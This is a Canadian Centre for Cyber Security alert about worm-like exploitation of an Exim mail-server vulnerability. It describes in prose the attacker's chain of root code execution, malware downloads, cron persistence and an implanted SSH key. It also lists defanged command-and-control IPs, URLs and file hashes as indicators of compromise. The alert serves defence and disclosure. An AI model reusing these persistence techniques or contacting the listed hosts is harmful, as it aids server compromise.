Alert - Active exploitation of EXIM vulnerability observed in the wild

Number: AL19-012
Date: 14 June 2019

Audience

This Alert is intended for IT professionals and managers of notified organizations.

Purpose

An Alert is used to raise awareness of a recently identified cyber threat that may impact cyber information assets, and to provide additional detection and mitigation advice to recipients. The Canadian Centre for Cyber Security ("Cyber Centre") is also available to provide additional assistance regarding the content of this Alert to recipients as requested.

Assessment

The Cyber Centre is aware of active exploitation of the EXIM vulnerability highlighted in Advisory AV19-109 published on 7 June 2019. There appears to be a “wormable” component which would spread this exploit to other vulnerable EXIM instances.

There are two waves of exploitations. In the first wave, a remote actor will send malicious emails to a vulnerable Exim server which, in turn, allows them to run malicious code under the Exim process' access level (in most instances this is ‘root’). This will download additional malware from a Command and Control server owned by the actor.

In the second wave, the actor will create a cron job to maintain persistence and download other components of the exploit chain. One of these components is a python script which actively searches for other vulnerable instances of EXIM server on the internet, connects to them and exploits the vulnerability on those targets (this is the wormable portion).

Additionally, the actor adds an RSA authentication key to the SSH server which allows them to connect to the server as root. To help evade detection, the actor uses TOR nodes to deliver the malicious code and connect over SSH.

Analytic comment

The Cyber Centre notes that the EXIM exploitations are evolving over time and that the type of malware and scripts which are downloaded are not consistent amongst exploitations. This may indicate that the actor is still experimenting with the exploitation chain, and that their final goal is not known, or it may indicate that multiple actors are making use of similar exploitations for different purposes.

Suggested actions

  • Patch the vulnerable version of EXIM to the latest supported version.
  • Examine logs for unusual or unauthorized activity.
  • Examine all cron jobs for any unauthorized entries and remove these if detected.
  • Examine locally installed RSA authentication keys to the SSH server for any unauthorised keys.
  • Monitor for any unusual SSH connections to the Exim server, specially from unknown IP addresses.

References

EXIM CCCS Advisory on Exim vulnerability: https://www.cyber.gc.ca/en/alerts/exim-security-advisory-0

Indicators of compromise

HASH Values

Filename: certificate.crt
MD5 Hash: certificate.crt|ff534af3104bc9a2030c9599bcd9a4b5
SHA1 Hash: certificate.crt|d135675da359304f60e3711f1993f36f267e1800
SHA256 Hash: certificate.crt|3a9459472329585e384a7e32af277844468d5b1fccda6d80285549f92ee67f07

Filename: se
MD5 Hash: se|a6823231d6bc5e7afda3c6e10f855956
SHA1 Hash: se|5797fe2ea08e627478777f2ede28bda2780707cf
SHA256 Hash: se|d8a787dc774748bf26e3dce1b079e9bef071c0327b6adcd8cc71ed956365201c

Filename: se
MD5 Hash: se|03fb0990ef6a33cc863d0c1a4568689c
SHA1 Hash: se|f8c6ae6fa828ccdc97d79c541c5e1b3d65d6653b
SHA256 Hash: se|b4bae03ab71439208b79edfc5eaec42babacee982231dce001b70ec42835063a

Filename: atd
MD5 Hash: atd|a6823231d6bc5e7afda3c6e10f855956
SHA1 Hash: atd|5797fe2ea08e627478777f2ede28bda2780707cf
SHA256 Hash: atd|d8a787dc774748bf26e3dce1b079e9bef071c0327b6adcd8cc71ed956365201c

Filename: s
MD5 Hash: s|8c7efb0493b6fb805b2c2f0593de0ab1
SHA1 Hash: s|d754163b369e4c27330cef03d6736779a699e5d9
SHA256 Hash: s|1c8f184c3cf902bafc9df23b13a5d51cf801026bc3bde9d6b05cf047523ac6ed

IP Indicator(s)

85[.]25[.]84[.]99
173[.]212[.]214[.]137

URL Indicator(s)

hxxps://85[.]25[.]84[.]99/up[.]php
hxxp://173[.]212[.]214[.]137/se
hxxp://173[.]212[.]214[.]137/icantgetit

URI Indicator(s)

/se
/icantgetit

Domain Indicator(s)

orion1709[.]startdedicated[.]de

Note to readers

The Canadian Centre for Cyber Security (Cyber Centre) operates as part of the Communications Security Establishment. We are Canada's national authority on cyber security and we lead the government's response to cyber security events. As Canada's national computer security incident response team, the Cyber Centre works in close collaboration with government departments, critical infrastructure, Canadian businesses and international partners to prepare for, respond to, mitigate, and recover from cyber events. We do this by providing authoritative advice and support, and coordinating information sharing and incident response. The Cyber Centre is outward-facing, welcoming partnerships that help build a stronger, more resilient cyber space in Canada.

Date modified: